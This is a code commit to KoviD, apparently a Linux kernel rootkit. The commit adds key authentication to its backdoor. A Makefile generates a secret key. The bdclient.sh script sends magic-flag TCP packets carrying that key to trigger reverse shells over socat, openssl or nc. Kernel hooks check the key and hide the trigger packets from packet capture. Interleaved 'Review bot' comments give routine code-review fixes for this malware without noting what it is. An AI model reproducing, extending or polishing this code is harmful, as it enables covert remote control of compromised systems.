Add simple key auth for backdoors
A new key is generated every time KoviD is compiled.

At the end of compilation:

Backdoor KEY: <KEY>

Run bdclient.sh like, e.g.:

$ sudo ./bdclient.sh socat <IP> <PORT> <Backdoor KEY>
JNE committed Oct 31, 2024
1 parent 84ccdb1 commit f8a08bc
Showing 6 changed files with 51 additions and 24 deletions.
4 changes: 4 additions & 0 deletions Makefile
Expand Up @@ -11,6 +11,7 @@ AS=$(shell which as)
CTAGS=$(shell which ctags))
JOURNALCTL := $(shell which journalctl)
UUIDGEN := $(shell uuidgen)
BDKEY := $(shell echo "0x$$(od -vAn -N8 -tx8 < /dev/urandom | tr -d ' \n')")

# TODO: Check if we can generate a random PROCNAME, something like:
# PROCNAME ?= $(shell uuidgen | cut -c1-8)
Expand Down Expand Up @@ -44,7 +45,10 @@ obj-m := ${OBJNAME}.o
CC=gcc

all: persist
sed -i 's/^#define BDKEY .*/#define BDKEY $(BDKEY)/' src/bdkey.h
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
@echo -n "Backdoor KEY: "
@echo $(BDKEY) | sed 's/^0x//'

persist:
sed -i "s|.lm.sh|${UUIDGEN}.sh|g" $(persist).S
18 changes: 9 additions & 9 deletions scripts/bdclient.sh
Expand Up @@ -62,16 +62,16 @@ usage="Use: [V=1] ./${0##*/} <method> <IP> <PORT>
Local port for connect-back session - must be unfiltered
Example:
./${0##*/} openssl 192.168.1.10 9999
./${0##*/} openssl 192.168.1.10 9999 <Backdoor KEY>
Verbose, example:
V=1 ./${0##*/} openssl 192.168.1.10 9999
V=1 ./${0##*/} openssl 192.168.1.10 9999 <Backdoor KEY>
Connect to GIFT address instead of this machine:
GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.10 443
GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.10 443 <Backdoor KEY>
If used alongside with GIFT, DRY(run) will NOT send KoviD instruction and will show client's command:
DRY=true GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.44 444"
DRY=true GIFT=192.168.0.30 ./${0##*/} openssl 192.168.1.44 444 <Backdoor KEY>"


errexit() {
Expand All @@ -91,7 +91,7 @@ check_util() {
done
} >&2

if [[ "$#" -ne 3 ]]; then
if [[ "$#" -ne 4 ]]; then
errexit "Missing parameter" true 1
fi

Expand Down Expand Up @@ -130,7 +130,7 @@ case $1 in
[[ ! -n "$V" ]] && exec &>/dev/null
# shellcheck disable=SC2086
"$NPING" "$1" $GIFT --tcp -p "$RR_OPENSSL" --flags Ack,rSt,pSh \
--source-port "$2" -c 1
--source-port "$2" --data="$3" -c 1
}
[[ "$DRY" == false ]] && f "$@" &
pushd "$PERMDIR" >/dev/null && {
Expand All @@ -147,7 +147,7 @@ case $1 in
[[ ! -n "$V" ]] && exec &>/dev/null
# shellcheck disable=SC2086
"$NPING" "$1" $GIFT --tcp -p "$RR_SOCAT" --flags Fin,Urg,aCK \
--source-port "$2" -c 1
--source-port "$2" --data="$3" -c 1
}
[[ "$DRY" == false ]] && f "$@" &
pushd "$PERMDIR" >/dev/null && {
Expand All @@ -163,7 +163,7 @@ case $1 in
[[ ! -n "$V" ]] && exec &>/dev/null
# shellcheck disable=SC2086
"$NPING" "$1" $GIFT --tcp -p "$RR_NC" --flags Ack,rSt,pSh \
--source-port "$2" -c 1
--source-port "$2" --data="$3" -c 1
}
[[ "$DRY" == false ]] && f "$@" &
listen "$NC" -lvp "$2"
Expand All @@ -177,7 +177,7 @@ case $1 in
[[ ! -n "$V" ]] && exec &>/dev/null
# shellcheck disable=SC2086
"$NPING" "$1" $GIFT --tcp -p "$RR_SOCAT_TTY" --flags Cwr,Urg,fiN,rsT \
--source-port "$2" -c 1
--source-port "$2" --data="$3" -c 1
}
[[ "$DRY" == false ]] && f "$@" &
pushd "$PERMDIR" >/dev/null && {
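Review bot: The synopsis line of the usage text, `usage="Use: [V=1] ./${0##*/} <method> <IP> <PORT>`, still lists three parameters, while the argument check in this section now requires four (`"$#" -ne 4`) and every example carries `<Backdoor KEY>`. That line appears here only as hunk context and is not among the changed lines; it should read `<method> <IP> <PORT> <Backdoor KEY>` so the text and the check agree. The `errexit "Missing parameter"` message could also name the key, since a three-argument call that was valid before this commit is now rejected without saying which argument is absent. The usage string and the `case` block both continue outside the hunks shown.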
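--- a/src/bdkey.h
+++ b/src/bdkey.h
@@ -0,0 +1,11 @@
+/**
+* BDKEY generated by Makefile
+* DO NOT EDIT
+*
+*/
+#ifndef __BDKEY_H
+#define __BDKEY_H
+
+#define BDKEY 0x0000000000000000
+
+#endif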
2 changes: 1 addition & 1 deletion src/lkm.h
Expand Up @@ -122,7 +122,7 @@ bool kv_sock_start_fw_bypass(void);
void kv_sock_stop_sniff(struct task_struct *tsk);
void kv_sock_stop_fw_bypass(void);
bool kv_bd_search_iph_source(__be32 saddr);
bool kv_check_cursing(struct tcphdr *);
bool kv_check_bdkey(struct tcphdr *, struct sk_buff *);
void kv_bd_cleanup_item(__be32 *);

/** proc handling */
36 changes: 24 additions & 12 deletions src/sock.c
Expand Up @@ -20,6 +20,7 @@
#include "fs.h"
#include "lkm.h"
#include "log.h"
#include "bdkey.h"

static LIST_HEAD(iph_node);
struct iph_node_t {
Expand Down Expand Up @@ -425,21 +426,32 @@ static int _bd_watchdog(void *t)
#endif
}

/**
* if TCP flags are:
* FUCK, CUNT or ASS then you know...
*/
bool kv_check_cursing(struct tcphdr *t) {
uint8_t fuckoff = 0;
bool kv_check_bdkey(struct tcphdr *t, struct sk_buff *skb) {
uint8_t silly_word = 0;
enum { FUCK=0x8c, CUNT=0xa5, ASS=0x38 };

fuckoff = t->fin << 7| t->syn << 6| t->rst << 5| t->psh << 4|
silly_word = t->fin << 7| t->syn << 6| t->rst << 5| t->psh << 4|
t->ack << 3| t->urg << 2| t->ece <<1| t->cwr;

//sudo nping <IP> --tcp -p <dst port> --flags <flag1,flag2,...> --source-port <reverse shell port> -c 1
if (fuckoff == FUCK || fuckoff == CUNT || fuckoff == ASS)
return true;

if (silly_word == FUCK || silly_word == CUNT || silly_word == ASS)
{
uint64_t address_value = 0;
unsigned long a = BDKEY;
unsigned char *data = skb->data + 40;

if (skb->len >= sizeof(struct tcphdr) + sizeof(struct iphdr) + 8) {
address_value = ((unsigned long)data[0] << 56) |
((unsigned long)data[1] << 48) |
((unsigned long)data[2] << 40) |
((unsigned long)data[3] << 32) |
((unsigned long)data[4] << 24) |
((unsigned long)data[5] << 16) |
((unsigned long)data[6] << 8) |
(unsigned long)data[7];
if (address_value == BDKEY)
return true;
}
}
return false;
}

Expand All @@ -460,7 +472,7 @@ static unsigned int _sock_hook_nf_cb(void *priv, struct sk_buff *skb,
int dst = _check_bdports(htons(tcph->dest));

/** Silence libpcap on CUNT/ASS/FUCK */
if (dst == RR_NULL || !kv_check_cursing(tcph)) break;
if (dst == RR_NULL || !kv_check_bdkey(tcph, skb)) break;

kf = kzalloc(sizeof(struct kfifo_priv), GFP_KERNEL);
if (!kf) {
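Review bot: `kv_check_bdkey` carries no comment describing what it matches, so the fixed offset in `unsigned char *data = skb->data + 40;` and the byte order of the comparison are unexplained. A header comment should state that the function returns true only when the TCP flag byte equals one of the three enum values and the 8 bytes at offset 40 of `skb->data`, read most-significant byte first, equal the build-time `BDKEY`. It should also say that 40 corresponds to the `sizeof(struct tcphdr) + sizeof(struct iphdr)` used in the length check, i.e. both headers without options. The call-site comment `/** Silence libpcap on CUNT/ASS/FUCK */` no longer describes the whole condition, because a flag match alone does not return true any more. `unsigned long a = BDKEY;` is never read and can be dropped.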
4 changes: 2 additions & 2 deletions src/sys.c
Expand Up @@ -659,7 +659,7 @@ static int m_packet_rcv(struct sk_buff *skb, struct net_device *dev,
return 0;
else {
struct tcphdr *tcp = (struct tcphdr*)skb_transport_header(skb);
if (kv_check_cursing(tcp))
if (kv_check_bdkey(tcp,skb))
return 0;
}
}
Expand All @@ -680,7 +680,7 @@ static int m_tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
return 0;
else {
struct tcphdr *tcp = (struct tcphdr*)skb_transport_header(skb);
if (kv_check_cursing(tcp))
if (kv_check_bdkey(tcp,skb))
return 0;
}
}